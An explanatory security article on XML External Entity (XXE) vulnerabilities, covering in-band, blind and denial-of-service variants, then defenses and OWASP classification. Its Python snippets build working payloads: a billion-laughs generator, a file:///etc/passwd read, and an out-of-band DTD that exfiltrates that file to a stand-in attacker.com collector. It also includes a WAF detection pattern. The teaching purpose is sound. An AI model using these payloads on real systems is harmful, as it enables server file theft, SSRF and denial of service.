What XML actually does
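An XML document can declare its own internal abbreviations, called entities. The famous ones are the predefined &lt;, &amp;, and &gt;. You can declare your own too: a DTD line such as <!ENTITY company "Acme Corp"> makes every &company; in the document expand to Acme Corp.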
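As a minimal sketch of internal entity expansion, the snippet below parses a small document with Python's standard-library ElementTree. The entity name `company` and the document itself are made up for illustration.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: the DTD declares one internal entity, `company`.
DOC = """<!DOCTYPE note [
  <!ENTITY company "Acme Corp">
]>
<note>Invoice from &company; &amp; partners</note>"""

root = ET.fromstring(DOC)

# The parser substitutes both the declared entity and the predefined &amp;.
note_text = root.text
print(note_text)
```

Nothing here touches the network or the filesystem: the replacement text lives inside the document itself.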
Useful. What makes it dangerous is the external variant — entities that reference a URL or file path. The parser fetches the target and substitutes the result inline.
The application then echoes the parsed document back somewhere — into an error message, a converted PDF, a generated thumbnail, a debug log. The attacker has read a server file through a feature that was never supposed to be a vulnerability.
Three variants
In-band (classic)
The parsed document is echoed back in the response. Attacker reads /etc/passwd and sees it returned in the API response or rendered PDF. Easiest to exploit; loudest in logs.
Blind (out-of-band)
No echo, but the parser still resolves external entities. Attacker hosts a malicious DTD that exfiltrates the file contents via an HTTP request to an attacker-controlled server. Slower, but the attacker can still read any file the parser process can read.
SSRF / DoS variant
External entity points at internal-only URLs (cloud metadata, internal admin panels, intranet). Or uses the billion-laughs entity expansion attack to consume memory until the parser dies.
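The entity expansion arithmetic can be sketched as follows. The helper names `laughs_document` and `expanded_size` are hypothetical; the snippet only parses a tiny, harmless instance and computes the size of the classic shape (nine levels of ten references) without ever building it.

```python
import xml.etree.ElementTree as ET

def laughs_document(levels: int, fanout: int, seed: str = "lol") -> str:
    """Build a nested-entity document; e{i} references e{i-1} `fanout` times."""
    decls = [f'<!ENTITY e0 "{seed}">']
    for i in range(1, levels + 1):
        refs = f"&e{i - 1};" * fanout
        decls.append(f'<!ENTITY e{i} "{refs}">')
    return f"<!DOCTYPE r [{''.join(decls)}]><r>&e{levels};</r>"

def expanded_size(levels: int, fanout: int, seed: str = "lol") -> int:
    """Characters produced by full expansion, computed without expanding."""
    return len(seed) * fanout ** levels

# Tiny instance: 3 levels of 3 references each -> 27 copies of "lol".
tiny = laughs_document(levels=3, fanout=3)
tiny_text = ET.fromstring(tiny).text

# The classic shape is only computed here, never parsed.
classic_chars = expanded_size(levels=9, fanout=10)
print(len(tiny), len(tiny_text), classic_chars)
```

The input grows linearly with the number of levels while the output grows exponentially, which is why a document of under a kilobyte can demand gigabytes from a parser that expands entities without limits.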
Anatomy of an attack
The app accepts an XML upload — an invoice, a SAML assertion, an Office document, an SVG. The user controls the XML payload. The parser is configured with defaults from 2005.
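A sketch of what such an upload could look like, wrapped in Python so it can be fed to a parser. The `invoice` and `note` element names and the `echo_note` helper are assumptions for illustration. Python's standard-library ElementTree is documented not to expand external entities, so the helper is written to tolerate a parse error; a parser with external entities enabled would place the file contents in `<note>` instead.

```python
import xml.etree.ElementTree as ET

def inband_payload(target: str = "file:///etc/passwd") -> str:
    """Return an invoice-like document whose <note> pulls in an external entity."""
    return (
        "<!DOCTYPE invoice [\n"
        f'  <!ENTITY xxe SYSTEM "{target}">\n'
        "]>\n"
        "<invoice><note>&xxe;</note></invoice>"
    )

def echo_note(xml_text: str):
    """Stand-in for an app that parses an upload and echoes <note> back."""
    try:
        return ET.fromstring(xml_text).findtext("note")
    except ET.ParseError:
        return None  # this parser refused the unresolved entity

payload = inband_payload()
echoed = echo_note(payload)
print(payload)
print("echoed:", echoed)
```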
The blind variant — out-of-band exfiltration
The application doesn't echo the parsed value. Doesn't matter. The attacker hosts http://attacker.com/evil.dtd, which declares parameter entities that do the work.
The parser fetches evil.dtd, which makes it read /etc/passwd and embed it in a new entity that points at the attacker's logger. The contents arrive in the attacker's web logs as a query parameter. No response from the vulnerable app needed.
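The chain described above can be sketched as two pieces of text: the hosted DTD and the document that triggers it. This follows the widely published parameter-entity pattern rather than any specific payload from this article; the entity names (`file`, `wrap`, `send`, `remote`) and the collector URL `http://attacker.com/log` are hypothetical.

```python
def evil_dtd(target: str, collector: str) -> str:
    """Text of the attacker-hosted DTD: read `target`, then request `collector`."""
    return (
        # Step 1: load the file into a parameter entity.
        f'<!ENTITY % file SYSTEM "{target}">\n'
        # Step 2: declare a second entity whose URL embeds the file contents.
        # &#x25; is an escaped '%', so `send` is only declared once `wrap` expands.
        f"<!ENTITY % wrap \"<!ENTITY &#x25; send SYSTEM '{collector}?d=%file;'>\">\n"
        "%wrap;\n"
        # Step 3: referencing `send` makes the parser issue the HTTP request.
        "%send;\n"
    )

def trigger_document(dtd_url: str) -> str:
    """Upload body: its only job is to make the parser fetch the remote DTD."""
    return (
        "<!DOCTYPE r [\n"
        f'  <!ENTITY % remote SYSTEM "{dtd_url}">\n'
        "  %remote;\n"
        "]>\n"
        "<r/>"
    )

dtd_text = evil_dtd("file:///etc/passwd", "http://attacker.com/log")
upload = trigger_document("http://attacker.com/evil.dtd")
print(dtd_text)
print(upload)
```

Note that the uploaded document contains no file path at all, only a URL, which is part of why this variant is harder to spot in request logs.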
Defenses
Disable external entities — the only real fix
Every major XML parser has a flag for this. Set it.
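As one hedged illustration in Python, the sketch below goes a step further than disabling external entities and refuses any document that carries a DOCTYPE, using only the standard library. It assumes the application never needs DTDs. `DTDForbidden` and `parse_untrusted` are hypothetical names, not the API of defusedxml or any other library.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

class DTDForbidden(ValueError):
    """Raised when an untrusted document carries a DOCTYPE declaration."""

def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Expat calls this as soon as it sees <!DOCTYPE ...>, before any entity
    # declared inside it can be referenced.
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed in untrusted XML")

def parse_untrusted(xml_data):
    """Parse str/bytes XML, refusing any document that declares a DTD."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_data, True)   # first pass: well-formedness and DOCTYPE check
    return ET.fromstring(xml_data)  # second pass: build the tree

invoice = parse_untrusted("<invoice><total>42</total></invoice>")

try:
    parse_untrusted('<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>')
    rejected = False
except DTDForbidden:
    rejected = True

print(invoice.findtext("total"), rejected)
```

Rejecting the DOCTYPE outright also shuts out entity expansion attacks, at the cost of parsing each document twice in this simple form.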
Other layers
- Prefer JSON. Most modern APIs don't need XML at all. If you can refuse XML uploads, refuse them.
- WAF rules can catch <!ENTITY and SYSTEM in request bodies, but parser config is the real fix. The WAF is a tripwire, not a wall.
- Watch for SAML and Office docs. Both are XML under the hood. SAML responses, in particular, have been a recurring XXE vector for years.
- Sandbox the parsing process. No outbound network. Read-only access to a minimal filesystem. If the parser is compromised, the blast radius is small.
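To illustrate why a body-matching rule is only a tripwire, here is a minimal sketch of such a check. The function name `looks_like_xxe` and the exact patterns are assumptions, not rules from any real WAF product. The same payload re-encoded as UTF-16 passes the byte match untouched, while an XML parser would still decode and process it.

```python
import re

# A DOCTYPE that points at an external DTD via SYSTEM or PUBLIC.
_DOCTYPE_EXTERNAL = re.compile(rb"<!DOCTYPE[^>\[]*\b(SYSTEM|PUBLIC)\b")

def looks_like_xxe(body: bytes) -> bool:
    """Flag raw request bodies that declare entities or an external DTD."""
    return b"<!ENTITY" in body or _DOCTYPE_EXTERNAL.search(body) is not None

payload = '<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>'

flag_utf8 = looks_like_xxe(payload.encode("utf-8"))    # caught
flag_utf16 = looks_like_xxe(payload.encode("utf-16"))  # missed: bytes are interleaved with NULs
flag_plain = looks_like_xxe(b"<invoice><total>42</total></invoice>")

print(flag_utf8, flag_utf16, flag_plain)
```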
The takeaway
XXE is the cleanest example of a feature that became a vulnerability. Nobody using an XML invoice API in 2025 wants their parser to fetch external URLs. But the XML 1.0 spec from 1998 enabled it, parsers shipped with it on, and more than two decades later the bug is still found in fresh code. Disable external entities in every XML parser you initialize. Prefer JSON for new APIs. Treat XML upload endpoints as high-value defensive targets.
OWASP standing
XXE had its own slot in the OWASP Top 10 (2017): A4, XML External Entities (XXE). In the 2021 refresh, OWASP folded XXE into the broader A05:2021 Security Misconfiguration category. The bug class hasn't gone away; it's just classified differently.
What to remember
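- Many XML parsers still ship with a "fetch arbitrary URLs" feature on by default, and older versions of others did. Most code doesn't need it. Turn it off, and check the defaults rather than assuming them.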
- The attack surface is wherever XML is parsed: SOAP endpoints, SAML assertions, SVG uploads, DOCX/XLSX/PPTX (zip + XML), config files, RSS feeds, OPML imports, XML-RPC.
- The damage is read-file, SSRF, DoS, and occasionally RCE via interaction with other parsers (the PHP expect:// wrapper, for example).
- defusedxml in Python, settings flags in Java/.NET/PHP, libxml prohibitions everywhere else. The fix is a few lines.
- Modernize. If the API can speak JSON, retire the XML endpoint. Bug class extinguished.
References
Formatted in APA 7.
- OWASP. (2017). A4:2017 — XML External Entities (XXE). OWASP Top 10. https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)
- OWASP. (2024). XML External Entity (XXE) prevention cheat sheet. OWASP Cheat Sheet Series. https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
- Python Software Foundation. (2024). XML vulnerabilities — defusedxml documentation. https://docs.python.org/3/library/xml.html#xml-vulnerabilities
- MITRE. (2024). CWE-611: Improper restriction of XML external entity reference. Common Weakness Enumeration. https://cwe.mitre.org/data/definitions/611.html